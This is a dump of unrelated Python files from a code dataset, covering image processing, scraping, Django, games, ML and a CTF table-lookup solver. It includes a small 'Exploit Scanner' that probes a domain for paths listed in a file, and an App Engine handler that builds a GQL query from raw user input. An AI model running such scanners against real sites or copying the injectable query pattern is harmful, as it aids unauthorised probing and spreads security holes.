text stringlengths 38 1.54M |
|---|
import numpy as np
import sys
import cv2
def func3():
img1 = cv2.imread('7.17/cat.jpg', -1)
if img1 is None:
print('Image load failed!')
return
img2 = img1
img3 = img2.copy()
img1[:, :] = (0, 255, 255) # Yellow
cv2.imshow('img1', img1)
cv2.imshow('img2', img2)
cv2.imshow('img3', img3)
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == '__main__' :
func3()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from urllib2 import Request, urlopen, URLError, HTTPError
def Space(j):
i = 0
while i<=j:
print " ",
i+=1
def CnsAdmin():
f = open("link.txt","r");
link = raw_input("😈 Web 😈 \n(Domain : example.com Yada www.example.com ): ")
print "\n\Mevcut Exploitler : \n"
while True:
sub_link = f.readline()
if not sub_link:
break
req_link = "http://"+link+"/"+sub_link
req = Request(req_link)
try:
response = urlopen(req)
except HTTPError as e:
continue
except URLError as e:
continue
else:
print "Exploit ➤ ",req_link
def Credit():
Space(9); print " SeS.py "
Space(9); print" Instagram can_s_officiall "
Space(9); print " Exploit Scanner "
Credit()
CnsAdmin() |
import math
# import timeit
# timeit.repeat("f1(x)", "from __main__ import f1", repeat=3, number=100)
# Digits Greatest
# 1 9 * 1 = 9
# 2 99 * 91 = 9009
# 3 993 * 913 = 906609
# 4 9999 * 9901 = 99000099
# 5 99989 * 99681 = 9966006699
# 6 999999 * 999001 = 999000000999
# 7 9998017 * 9997647 = 99956644665999
# 8 99999999 * 99990001 = 9999000000009999
# 9
# 10 9999999999 * 9999900001 = 99999000000000099999
# Much slower than using string array methods
def reverse(n):
reversed = 0
while n > 0:
reversed = 10 * reversed + n % 10
n = n / 10
return reversed
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in range(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits))):
## for j in range(int(math.pow(10, factorDigits -1)), int(math.pow(10, factorDigits))):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## return largestFound
# Does not repeat any factor pairs => roughly twice as fast
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in range(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits))):
## for j in range(i, int(math.pow(10, factorDigits))):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## return largestFound
# Try largest factors first and continue downwards
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## return largestFound
# Skip smaller factor pairs once a palindrome product is found for a given factor
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# End once remaining factor pairs cannot produce greater products
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * i:
## break
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# More aggressively ends once remaining factor pairs cannot produce greater products
# Each product found is guaranteed to be greater than the last
# Increasing optimization as value of last product found increases
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * i:
## break
## for j in reversed(xrange(int(math.pow(10, factorDigits - 1)), i + 1)):
## if largestFound >= i * j:
## break
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
##def largestPalindromeProduct(factorDigits):
## largestFound = 1
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * i:
## break
## for j in reversed(xrange(max(int(math.pow(10, factorDigits - 1)), largestFound / i), i + 1)):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## largestFound = i * j
## break
## return largestFound
# Improved try largest factors first
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## for j in reversed(xrange(i, int(math.pow(10, factorDigits)))):
## if largestFound >= i * j:
## break
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# Try range further narrowed so that tested factor pairs can strictly produce a greater product
# Marginally faster for 7 factorDigits than alternate
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## for j in reversed(xrange(max(i, int(math.ceil(largestFound / float(i)))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * j:
## break
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## if i * j > largestFound:
## largestFound = i * j
## break
## return largestFound
# Unnecessary checks removed
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## for j in reversed(xrange(max(i, int(math.ceil(largestFound / float(i)))), int(math.pow(10, factorDigits)))):
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## largestFound = i * j
## break
## return largestFound
# Only check factor pairs where at least one factor is a multiple of 11
##def largestPalindromeProduct(factorDigits):
## largestFound = 0
## if factorDigits == 1:
## return 9
## for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
## if largestFound >= i * (math.pow(10, factorDigits) - 1):
## break
## if i % 11 == 0:
## j = int(math.pow(10, factorDigits))
## dj = 1
## else:
## j = int(math.pow(10, factorDigits)) / 11 * 11
## dj = 11
## while j > i and j > largestFound / i:
## if str(i * j) == str(i * j)[::-1]:
## print "%d * %d = %d" % (i, j, i * j)
## largestFound = i * j
## break
## j = j - dj
## return largestFound
# For loop version, slightly faster
def largestPalindromeProduct(factorDigits):
largestFound = 0
if factorDigits == 1:
return 9
for i in reversed(xrange(int((math.pow(10, factorDigits - 1))), int(math.pow(10, factorDigits)))):
if largestFound >= i * (math.pow(10, factorDigits) - 1):
break
if i % 11 == 0:
j1 = max(i, int(math.ceil(largestFound / float(i))))
j2 = int(math.pow(10, factorDigits))
dj = 1
else:
j1 = int(math.ceil(max(i, math.ceil(largestFound / float(i))) / float(11)) * 11)
j2 = int(math.pow(10, factorDigits)) / 11 * 11
dj = 11
for j in reversed(xrange(j1, j2 + 1, dj)):
if str(i * j) == str(i * j)[::-1]:
print "%d * %d = %d" % (i, j, i * j)
largestFound = i * j
break
return largestFound
##for x in range(100):
print largestPalindromeProduct(x)
##for i in reversed(xrange(10, 100/11*11+1)):
## for j in reversed(xrange(i, 11)):
## print i, j, i * j
##for i in reversed(xrange(int(math.ceil(10 / float(11))) * 11, 100, 11)):
## print i
|
import unittest
import mop
from . import InMemoryDatabase
class DatabaseTest(unittest.TestCase):
def test_database(self):
db = InMemoryDatabase()
db.insert("foo", {"a": 1, "b": 2})
assert db.lookup("foo") == {"a": 1, "b": 2}
assert db.store == {"foo": '{"data":{"a":1,"b":2},"type":"plain"}'}
db.insert("foo", {"a": 3, "c": 5})
assert db.lookup("foo") == {"a": 3, "c": 5}
assert db.store == {"foo": '{"data":{"a":3,"c":5},"type":"plain"}'}
db.insert("bar", [1, 2, "b"])
assert db.lookup("foo") == {"a": 3, "c": 5}
assert db.lookup("bar") == [1, 2, "b"]
assert db.store == {
"foo": '{"data":{"a":3,"c":5},"type":"plain"}',
"bar": '{"data":[1,2,"b"],"type":"plain"}',
}
Point = mop.Class(
name="Point",
superclass=mop.Class.base_object_class(),
)
Point.add_attribute(Point.attribute_class()(name="x"))
Point.add_attribute(Point.attribute_class()(name="y"))
Point.add_method(Point.method_class()(
name="x",
body=lambda self: self.metaclass.all_attributes()["x"].value(self)
))
Point.add_method(Point.method_class()(
name="y",
body=lambda self: self.metaclass.all_attributes()["y"].value(self)
))
Point.finalize()
point = Point(x=10, y=23)
assert point.x() == 10
assert point.y() == 23
db.insert("p", point)
point2 = db.lookup("p")
assert point2.x() == 10
assert point2.y() == 23
assert point is not point2
assert db.store == {
"foo": '{"data":{"a":3,"c":5},"type":"plain"}',
"bar": '{"data":[1,2,"b"],"type":"plain"}',
"p": '{"class":"Point","data":{"x":10,"y":23},"type":"object"}',
}
|
import pygame
from maze import Maze
import game_functions as gf
from pm import PM
from ghosts import Red, Blue, Pink, Orange, Cherry
from stats import Stats
from display import Display
def run_game():
# Initialize pygame, settings, and screen object.
pygame.init()
screen = pygame.display.set_mode((630, 800))
pygame.display.set_caption("PACMAN")
# Draw maze
mazefile = 'maze.txt'
maze = Maze(screen, mazefile)
# Pacman
pm = PM(screen, maze)
# Stats
stats = Stats()
# Ghosts
red = Red(screen, maze)
blue = Blue(screen, maze)
pink = Pink(screen, maze)
orange = Orange(screen, maze)
cherry = Cherry(screen)
display = Display(screen, pm)
while True:
if stats.game_active:
gf.check_events(screen, pm, maze, red, blue, pink, orange, stats, display)
gf.update_screen(screen, pm, maze, red, blue, pink, orange, cherry, stats, display)
pygame.display.flip()
run_game()
|
# encoding=utf-8
import urllib
import json
import io
from BeautifulSoup import BeautifulSoup
URL = 'https://www.kinopoisk.ru/film/435/'
def parse_url(url):
data = urllib.urlopen(url)
data = data.read().decode("windows-1251").encode("utf-8")
soup = BeautifulSoup(''.join(data))
parsed_data = dict({'year': 0, 'genres':[], 'country': '', 'budget': 0, 'usa': 0, 'world': 0, 'age_restriction': 0,
'duration': 0, 'rating': 0})
content = soup.body.find('div', id='infoTable').findAll('td')
for i in range(len(content)):
if content[i].contents[0].string == u'год':
parsed_data['year'] = content[i + 1].text
if content[i].contents[0].string == u'страна':
parsed_data['country'] = content[i + 1].text
if content[i].contents[0].string == u'бюджет':
parsed_data['budget'] = content[i + 1].find('div').text.replace(' ', '').replace(u'сборы', '')
if content[i].contents[0].string == u'сборы в США':
parsed_data['usa'] = content[i + 1].find('div').text.replace(' ', '').replace(u'сборы', '')
if content[i].contents[0].string == u'сборы в мире':
parsed_data['world'] = content[i + 1].find('div').text.replace(' ', '').replace(u'сборы', '')
if content[i].contents[0].string == u'возраст':
parsed_data['age_restriction'] = content[i + 1].text
if content[i].contents[0].string == u'время':
parsed_data['duration'] = content[i + 1].contents[0].string
content = soup.find('div', id='block_rating', itemprop='aggregateRating').find('a')
parsed_data['rating'] = content.find('span').string
for genre in soup.find('span', itemprop="genre").findAll('a'):
parsed_data['genres'].append(genre.string)
return parsed_data
with io.open('film_info', 'w', encoding='utf-8') as film:
parsed = parse_url(URL)
# print(parsed['country'])
film.write(json.dumps(parsed, indent=4, sort_keys=True, ensure_ascii=False))
film.close()
|
#! /usr/bin/env python3
import sys
import subprocess
KERNEL_OFFSET = 1024 * 512
def _concat(a, b):
while (True):
buf = b.read(4*1024)
if (len(buf) == 0):
break
a.write(buf)
def main():
if len(sys.argv) != 4:
return -1
bootloader = sys.argv[1]
kernel = sys.argv[2]
image = sys.argv[3]
# TODO check `bootloader` and `kernel` exists
# Generate `bootloader` binary
subprocess.check_call(['objcopy', '-Obinary', bootloader, image])
with open(image, 'r+b') as image_fd:
# Get `bootloader` length
image_fd.seek(0, 2)
bootloader_len = image_fd.tell()
print(f"[gen_image] Bootloader size: {bootloader_len} bytes")
# Append `kernel` ELF file
image_fd.seek(KERNEL_OFFSET, 0)
_concat(image_fd, open(kernel, 'rb'))
return 0
if __name__ == '__main__':
raise SystemExit(main())
|
import numpy as np
import mediapipe as mp
import cv2
mp_drawing = mp.solutions.drawing_utils
mp_hands = mp.solutions.hands
# Function takes in the all the coordinates for all the points, selects the relevants tracking point
# and OUTPUTS the average of all the markers in the xy plane (get centre of hand)
def get_params(hand_landmarks):
points = {}
parameters = ['INDEX_TIP', 'WRIST', 'MIDDLE_FINGER', 'RING_FINGER', 'PINKY_FINGER', 'THUMB']
index_points = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP]
points['INDEX_TIP'] = np.array([index_points.x, index_points.y, index_points.z])
wrist_points = hand_landmarks.landmark[mp_hands.HandLandmark.WRIST]
points['WRIST'] = np.array([wrist_points.x, wrist_points.y, wrist_points.z])
middle_finger_points = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP]
points['MIDDLE_FINGER'] = np.array([middle_finger_points.x, middle_finger_points.y, middle_finger_points.z])
ring_finger_points = hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP]
points['RING_FINGER'] = np.array([ring_finger_points.x, ring_finger_points.y, ring_finger_points.z])
pinky_points = hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP]
points['PINKY_FINGER'] = np.array([pinky_points.x, pinky_points.y, pinky_points.z])
thumb_points = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP]
points['THUMB'] = np.array([thumb_points.x, thumb_points.y, thumb_points.z])
hand_x_value = sum([points[i][0] for i in
parameters]) / len(parameters)
hand_y_value = sum([points[i][1] for i in
parameters]) / len(parameters)
return [hand_x_value, hand_y_value]
#inputs the x,y for the centre of the hand
# Outputs the discrete/ qualitative position of the centre of the hand
def gridify(xy_array):
x = xy_array[0]
y = xy_array[1]
if x >= 0.5 and y > 0.5:
return 'Bottom Right'
elif x < 0.5 and y >= 0.5:
return 'Bottom Left'
elif x < 0.5 and y < 0.5:
return 'Top Left'
else:
return 'Top Right'
# Inputs x,y values that are bothh in the range [0,1]
# Outputs absolute x,y positionn by multiplyinng the ratios by image dimensions to get the pixels where to place stuff
def ratio_to_pixel(coordinates, image_shape):
rows, cols, _ = image_shape
if coordinates is None:
return None
return np.array(coordinates) * np.array([int(cols), int(rows)])
# takes the image frame, coordinates [x,y] in absolute and the classification
# outputs the image with the text appearinng at the absolute coordinates
def label_params(frame, coordinates, text):
if coordinates is None:
return
# print(centre of hand)
cv2.putText(frame, text, (int(coordinates[0]), int(coordinates[1])),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
# Inputs Grid Location as String (ie: 'Top Right')
# Outputs Corresponding Note
def location_to_note(location: str) -> str:
if location == 'Top Left':
return 'C'
elif location == 'Top Right':
return 'D'
elif location == 'Bottom Left':
return 'E'
else:
return 'F' |
import pygal
import csv
import operator
from matplotlib import pyplot as plt
from datetime import datetime
import os, re
#from clases.productos import Producto
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "subastas.settings")
import django
django.setup()
from django.db import models
from ah.models import Producto, Cotizacion
class Graficador():
def obtenerGraficaEvolucion(self, producto):
formatoFecha = "%H:%M:%S"
minimos = []
maximos = []
fechas = []
promedios = []
# Abrimos el CSV como fichero
with open('ah/resultados/Rosaluz.csv', encoding='utf8') as f:
reader = csv.reader(f)
# Recorro todaslas lineas del CSV
for row in reader:
fechas.append(str(row[0]))
maximos.append(float(row[2]))
minimos.append(float(row[1]))
promedios.append(float(row[3]))
# Dibujo la grafica de lineas
line_chart = pygal.Line()
line_chart.title = ('Evolucion de '+producto.nombre)
line_chart.x_labels = fechas
line_chart.add('Maximos', maximos)
line_chart.add('Minimos', minimos)
line_chart.add('Promedio', promedios)
line_chart.render_to_file('media/graficas/Rosaluz.svg')
|
import socket
import threading
def send_message(udp):
addr = input("enter destination ip:")
port = int(input("enter destination port:"))
while True:
message = input("enter message to send:")
udp.sendto(message.encode(), (addr, port))
def recv_message(udp):
while True:
recv_data = udp.recvfrom(1024)
recv_message, (recv_ip, recv_addr) = recv_data
print(recv_message.decode())
def main():
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
local_port = int(input("enter your local port:"))
local_addr = ("", local_port)
udp.bind(local_addr) # bind local address to inform your address to the one you chat with
thread1 = threading.Thread(target=send_message, args=(udp,))
thread2 = threading.Thread(target=recv_message, args=(udp,))
thread1.start()
thread2.start()
if __name__ == '__main__':
main()
|
from similarity import *
# WEIGHT_TFIDF = 0.25
# WEIGHT_PRICE = 0.25
# WEIGHT_ORDERING = 0.25
# WEIGHT_CUISINE = 0.25
def calc_r2u(user, restaurant, tfidf, weight):
tfidf *= weight["tfidf"]
price_sim = calc_price_sim(user['price'], restaurant['price']) * weight["price"]
ordering_sim = calc_ordering_sim(user['ordering'], restaurant['ordering']) * weight["ordering"]
cuisine_sim = calc_cuisine_sim(user['cuisine'], restaurant['cuisine']) * weight["cuisine"]
return tfidf + price_sim + ordering_sim + cuisine_sim
def calc_price_sim(user, restaurant):
return similarity(user, restaurant)
def calc_ordering_sim(user, restaurant):
return similarity(user, restaurant)
def calc_cuisine_sim(user, restaurant):
return similarity(user, restaurant)
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
import os
import urllib
import jinja2
import datetime
import sys
from google.appengine.api import mail
from google.appengine.api import users
from google.appengine.api import urlfetch
from google.appengine.ext import db
from models import User
if 'libs' not in sys.path:
sys.path[0:0] = ['libs']
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True
)
class Unsubscribe(webapp2.RequestHandler):
def get(self):
from tweepy import API
template = JINJA_ENVIRONMENT.get_template('templates/unsubscribe.html')
self.response.write(template.render({}))
def post(self):
#Get variables from post
twitterUsername = self.request.get('twitterUsername')
found = False
template = JINJA_ENVIRONMENT.get_template('templates/template.html')
#get pseudo
users = db.GqlQuery("SELECT * FROM User WHERE twitterUsername ='%s'" %(twitterUsername) )
for res in users:
found = True
if not res.active:
#already deactivated
templateVars = { "message" : 'you account is already deactivated'}
self.response.write(template.render(templateVars) )
else:
#now deactivated
print 'correspondance'
res.active=False
res.put()
templateVars = { "message" : 'you account has been deactivated'}
self.response.write(template.render(templateVars) )
sendMail(res.mail,res.twitterUsername,res.firstName)
if not found:
templateVars = { "message" : "there is no profile linked to this username"}
self.response.write(template.render(templateVars) )
def sendMail(email,twitterUsername,firstName):
message = mail.EmailMessage(sender="Admin <%s>"%(os.environ['admin_mail']), subject="Account unactivated")
message.to = "%s <%s>"%(twitterUsername,email)
message.body = """
Hi %s
Your account has been deactivated
"""%(firstName)
message.send()
app = webapp2.WSGIApplication([
('/unsubscribe', Unsubscribe)
], debug=True)
|
from django.contrib import admin
from .models import Employee,EmployeeEducationDetail,EmployeeWorkDetail
admin.site.register(Employee)
admin.site.register(EmployeeEducationDetail)
admin.site.register(EmployeeWorkDetail)
# Register your models here.
|
bike={"yamaha","apache","fz"}
#loop through the list
for x in bike:
print(x)
#yamaha
#apache
#fz
|
from django.db import models
from django.core.validators import RegexValidator
class Customers(models.Model):
TC = models.CharField(max_length=11, validators=[
RegexValidator(regex=r'^[1-9]{1}[0-9]{9}[02468]{1}$', message='Invalid TC', code='nomatch')],
null=False, unique=True)
Name = models.CharField(max_length=50)
Surname = models.CharField(max_length=50)
Phone = models.CharField(max_length=11) # format : 0111 111 11 11
City = models.CharField(max_length=25)
Town = models.CharField(max_length=25)
def __str__(self):
return self.Name + " " + self.Surname
|
from distutils.command.bdist import bdist
import sys
if 'egg' not in bdist.format_commands:
try:
bdist.format_commands['egg'] = ('bdist_egg', "Python .egg file")
except TypeError:
# For backward compatibility with older distutils (stdlib)
bdist.format_command['egg'] = ('bdist_egg', "Python .egg file")
bdist.format_commands.append('egg')
del bdist, sys
|
#!/usr/bin/env python3
from aws_cdk import core
from aws_lambda.aws_lambda_stack import AwsLambdaStack
app = core.App()
AwsLambdaStack(app, "aws-lambda", env=core.Environment(region="eu-central-1"))
app.synth()
|
from pwn import *
byte_table=[0x0BB,0x2,0x9B,0x3,0x0C4,0x4,0x6C,0x5,0x4A,0x6,0x2E,0x7,0x22,
0x8,0x45,0x9,0x33,0x0A,0x0B8,0x0B,0x0D5,0x0C,0x6,0x0D,0x0A,
0x0E,0x0BC,0x0F,0x0FA,0x10,0x79,0x11,0x24,0x12,0x0E1,
0x13,0x0B2,0x14,0x0BF,0x15,0x2C,0x16,0x0AD,0x17,0x86,
0x18,0x60,0x19,0x0A4,0x1A,0x0B6,0x1B,0x0D8,0x1C,0x59,
0x1D,0x87,0x1E,0x41,0x1F,0x94,0x20,0x77,0x21,0x0F0,0x22,
0x4F,0x23,0x0CB,0x24,0x61,0x2,0x25,0x26,0x0C0,0x27,
0x97,0x28,0x2A,0x29,0x5C,0x2A,0x8,0x2B,0x0C9,0x2C,0x9F,
0x2D,0x43,0x2E,0x4E,0x2F,0x0CF,0x30,0x0F9,0x31,0x3E,
0x32,0x6F,0x33,0x65,0x34,0x0E7,0x35,0x0C5,0x36,0x39,
0x37,0x0B7,0x38,0x0EF,0x39,0x0D0,0x3A,0x0C8,0x3B,0x2F,
0x3C,0x0AA,0x3D,0x0C7,0x3E,0x47,0x3F,0x3C,0x40,0x81,
0x41,0x32,0x42,0x49,0x43,0x0D3,0x44,0x0A6,0x45,0x96,
0x46,0x2B,0x47,0x58,0x48,0x40,0x49,0x0F1,0x4A,0x9C,0x4B,
0x0EE,0x4C,0x1A,0x4D,0x5B,0x4E,0x0C6,0x4F,0x0D6,0x50,
0x80,0x51,0x2D,0x52,0x6D,0x53,0x9A,0x54,0x3D,0x55,0x0A7,
0x56,0x93,0x57,0x84,0x58,0x0E0,0x59,0x12,0x5A,0x3B,0x5B,
0x0B9,0x5C,0x9,0x5D,0x69,0x5E,0x0BA,0x5F,0x99,0x60,0x48,
0x61,0x73,0x62,0x0B1,0x63,0x7C,0x64,0x82,0x65,0x0BE,
0x66,0x27,0x67,0x9D,0x68,0x0FB,0x69,0x67,0x6A,0x7E,0x6B,
0x0F4,0x6C,0x0B3,0x6D,0x5,0x6E,0x0C2,0x6F,0x5F,0x70,0x1B,
0x71,0x54,0x72,0x23,0x73,0x71,0x74,0x11,0x75,0x30,0x76,
0xD2,0x77,0x0A5,0x78,0x68,0x79,0x9E,0x7A,0x3F,0x7B,
0x0F5,0x7C,0x7A,0x7D,0x0CE,0x7E,0x0B,0x7F,0x0C,0x80,
0x85,0x81,0x0DE,0x82,0x63,0x83,0x5E,0x84,0x8E,0x85,0x0BD,
0x86,0x0FE,0x87,0x6A,0x88,0x0DA,0x89,0x26,0x8A,0x88,
0x8B,0x0E8,0x8C,0x0AC,0x8D,0x3,0x8E,0x62,0x8F,0x0A8,0x90,
0x0F6,0x91,0x0F7,0x92,0x75,0x93,0x6B,0x94,0x0C3,0x95,
0x46,0x96,0x51,0x97,0x0E6,0x98,0x8F,0x99,0x28,0x9A,0x76,
0x9B,0x5A,0x9C,0x91,0x9D,0x0EC,0x9E,0x1F,0x9F,0x44,0x0A0,
0x52,0x0A1,0x1,0x0A2,0x0FC,0x0A3,0x8B,0x0A4,0x3A,0x0A5,
0x0A1,0x0A6,0x0A3,0x0A7,0x16,0x0A8,0x10,0x0A9,0x14,0x0AA,
0x50,0x0AB,0x0CA,0x0AC,0x95,0x0AD,0x92,0x0AE,0x4B,0x0AF,
0x35,0x0B0,0x0E,0x0B1,0x0B5,0x0B2,0x20,0x0B3,0x1D,0x0B4,
0x5D,0x0B5,0x0C1,0x0B6,0x0E2,0x0B7,0x6E,0x0B8,0x0F,0x0B9,
0x0ED,0x0BA,0x90,0x0BB,0x0D4,0x0BC,0x0D9,0x0BD,0x42,
0x0BE,0x0DD,0x0BF,0x98,0x0C0,0x57,0x0C1,0x37,0x0C2,0x19,
0x0C3,0x78,0x0C4,0x56,0x0C5,0x0AF,0x0C6,0x74,0x0C7,0x0D1,
0x0C8,0x4,0x0C9,0x29,0x0CA,0x55,0x0CB,0x0E5,0x0CC,0x4C,
0x0CD,0x0A0,0x0CE,0x0F2,0x0CF,0x89,0x0D0,0x0DB,0x0D1,
0x0E4,0x0D2,0x38,0x0D3,0x83,0x0D4,0x0EA,0x0D5,0x17,0x0D6,
0x7,0x0D7,0x0DC,0x0D8,0x8C,0x0D9,0x8A,0x0DA,0x0B4,0x0DB,
0x7B,0x0DC,0x0E9,0x0DD,0x0FF,0x0DE,0x0EB,0x0DF,0x15,
0x0E0,0x0D,0x0E1,0x2,0x0E2,0x0A2,0x0E3,0x0F3,0x0E4,0x34,
0x0E5,0x0CC,0x0E6,0x18,0x0E7,0x0F8,0x0E8,0x13,0x0E9,
0x8D,0x0EA,0x7F,0x0EB,0x0AE,0x0EC,0x21,0x0ED,0x0E3,0x0EE,
0x0CD,0x0EF,0x4D,0x0F0,0x70,0x0F1,0x53,0x0F2,0x0FD,0x0F3,
0x0AB,0x0F4,0x72,0x0F5,0x64,0x0F6,0x1C,0x0F7,0x66,0x0F8,
0x0A9,0x0F9,0x0B0,0x0FA,0x1E,0x0FB,0x0D7,0x0FC,0x0DF,
0x0FD,0x36,0x0FE,0x7D,0x0FF]
output=[39, 179, 115, 157, 245, 17, 231, 177,
179, 190, 153, 179, 249, 249, 244, 48,
27, 113, 153, 115, 35, 101, 153, 177,
101, 17, 17, 190, 35, 153, 39, 249,
35, 153, 5, 101, 206]
print 'array size ='+str(len(byte_table))
print 'output size ='+str(len(output))
#flag{t4ble_l00kups_ar3_b3tter_f0r_m3}
for i in range(len(output)):
print str(i)+' th: '
for j in range(len(byte_table)):
if byte_table[j]==output[i]:
if byte_table[j-1]<126 and byte_table[j-1]>33:
print chr(byte_table[j-1])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
import yaml
import indexer
import searcher
import api
import frontend
from indexer import stripTag
from searcher import binaryIndexSearch
class TestUM(unittest.TestCase):
config = {'PATH_WIKI_XML': 'testdata', 'PATH_INDEX_FILES': 'testdata/index', 'FILENAME_WIKI': 'dump.xml', 'FILENAME_INDEX': 'index.txt', 'FILENAME_SORTED_INDEX': 'sorted_index.txt', 'HOSTNAME': 'localhost', 'PORT': '5000'}
def testIndexerMain(self):
self.assertEqual( indexer.main(".config/config_test.yml"), None)
def testIndexerStripTag(self):
self.assertEqual( stripTag('{http://www.mediawiki.org/xml/export-0.10/}title'), 'title')
self.assertEqual( stripTag('title'), 'title')
with self.assertRaises(TypeError) and self.assertRaises(SystemExit):
stripTag('conclusion xyz xyz')
def testSearcherBinaryIndexSearch(self):
self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'c'), (['c','2','5','None'], False))
self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'd'), (['c','2','5','None'], False))
self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'e'), (False, False))
self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'a'), (['ab','abc'], True))
self.assertEqual( binaryIndexSearch([], 'a'), (False, False))
self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], ''), (False, False))
self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','5','None'],['d','4','6','c']], 'c'), (False, False))
if __name__ == '__main__':
unittest.main() |
from django.shortcuts import render, redirect
from repository import models
from backend.auth import auth
@auth.check_login
def manage_index(request):
"""
管理界面首页
:param request:
:return:
"""
context = {
'user_info': request.session.get('user_info'),
}
print(request.session.get('user_info'))
return render(request, 'backend/backend_index.html', context)
@auth.check_login
def base_info(request):
return render(request, 'backend/backend_user_info.html') |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import svm, metrics
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from skimage import io
from skimage.transform import resize
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
#Aqui los datos junto con su categoria (image_name, categoria)
data = pd.read_csv('oxford-102-flowers/test.txt', delimiter=' ',
header=None).values
n_samples = data.shape[0]
images = []
#sizes = np.zeros((n_samples,2))
for i in range(n_samples):
img = io.imread('oxford-102-flowers/'+data[i,0])/255
img = resize(img, (64,64))
#grey = np.sum(img, axis=2)/3
#sizes[i,0], sizes[i,1]= grey.shape[0], grey.shape[1]
images.append(img.ravel())
if i%500 == 0:
print(i)
images = np.array(images)
#Obtener datos
